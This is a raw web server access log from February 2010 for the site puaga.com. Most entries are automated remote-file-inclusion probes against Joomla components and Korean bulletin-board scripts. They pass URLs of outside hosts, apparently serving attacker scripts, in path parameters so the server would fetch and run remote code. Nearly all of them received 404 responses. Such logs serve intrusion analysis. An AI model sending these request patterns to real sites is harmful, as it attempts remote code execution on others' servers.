114.108.128.160 - - [11/Feb/2010:04:32:05 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:08 -0800] "GET /logs/access_100107.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:08 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:08 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [11/Feb/2010:04:32:10 -0800] "GET /logs/access_100126.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:12 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:12 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:12 -0800] "GET /logs/access_100107.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:14 -0800] "GET /logs/access_100107.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:14 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:14 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:15 -0800] "GET /logs/access_100107.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:15 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:15 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:25 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:26 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:29 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:29 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
114.108.128.160 - - [11/Feb/2010:04:32:30 -0800] "GET /logs/access_100125.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [11/Feb/2010:04:32:35 -0800] "GET /logs/access_100111.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://jireh.or.kr/images/pastor_index_.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.13.69.245 - - [11/Feb/2010:04:32:40 -0800] "GET /logs/access_100121.log//bbs/delete_comment.php?board.skin_path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:33:08 -0800] "GET /logs/access_100203.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [11/Feb/2010:04:33:09 -0800] "GET /logs/access.log//bbs//delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:33:28 -0800] "GET /logs/access_100118.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:33:28 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:33:28 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:33:32 -0800] "GET /logs/access_100204.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:33:38 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:33:46 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:33:46 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:33:47 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
208.93.149.176 - - [11/Feb/2010:04:33:47 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig.absolute.path=http://www.70-80fuif.be/2010/sql?%0D?&u=x HTTP/1.1" 404 5258 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /logs/access_100118.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:31 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:34:37 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:34:37 -0800] "GET /logs/access_100127.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:34:37 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:41 -0800] "GET /logs/access_100109.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [11/Feb/2010:04:34:49 -0800] "GET /logs/access_100109.log%20%20//skin/zero_vote/error.php?dir=http://wkmg.co.kr/bbs/lib/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:37:33 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:37:33 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:37:33 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:37:40 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:37:51 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:37:51 -0800] "GET /logs/access_100112.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:37:51 -0800] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:37:57 -0800] "GET /logs/access_100123.log%20%20//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.47.80.36 - - [11/Feb/2010:04:38:37 -0800] "GET /robots.txt HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "simple.puaga.com"
193.47.80.36 - - [11/Feb/2010:04:38:38 -0800] "GET /grader/ HTTP/1.1" 302 5 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "simple.puaga.com"
193.47.80.36 - - [11/Feb/2010:04:38:40 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "puaga.com"
193.47.80.36 - - [11/Feb/2010:04:38:41 -0800] "GET /simplepack/grader/index2.php HTTP/1.1" 200 8055 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:45 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:45 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:48 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:48 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:48 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:39:51 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:40:08 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:40:14 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:40:14 -0800] "GET /logs/access_100118.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:40:14 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:40:20 -0800] "GET /logs/access_100204.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:04:40:33 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:04:40:33 -0800] "GET /logs/access_091231.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:04:40:34 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:41:48 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:41:48 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:41:48 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:42:14 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:42:14 -0800] "GET /logs/access_100128.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:42:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:33 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:34 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:34 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:42:44 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:54 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:54 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:42:54 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:42:55 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [11/Feb/2010:04:43:05 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:43:23 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:43:23 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:43:24 -0800] "GET /logs/access_100126.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:44:17 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:44:17 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:44:17 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
119.63.193.70 - - [11/Feb/2010:04:44:19 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "DoCoMo/2.0 P05A(c100;TB;W24H15) (compatible; BaiduMobaider/1.0; +http://www.baidu.jp/spider/)" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:44:20 -0800] "GET /logs/access_100111.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:44:20 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:44:20 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:44:31 -0800] "GET /logs/access_100112.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.158.246 - - [11/Feb/2010:04:44:44 -0800] "GET /logs/access_100123.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:44:44 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.13.139.254 - - [11/Feb/2010:04:44:57 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:45:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:45:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.23.18.60 - - [11/Feb/2010:04:45:25 -0800] "GET /logs/access_100128.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:29 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:29 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:31 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:31 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:31 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:35 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:35 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.143.154 - - [11/Feb/2010:04:45:35 -0800] "GET /logs/access_100114.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:04:45:54 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:04:45:55 -0800] "GET /orange_g/forum/viewtopic.php?p=28111 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
75.125.143.154 - - [11/Feb/2010:04:46:02 -0800] "GET /logs/access_100111.log%20%20/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
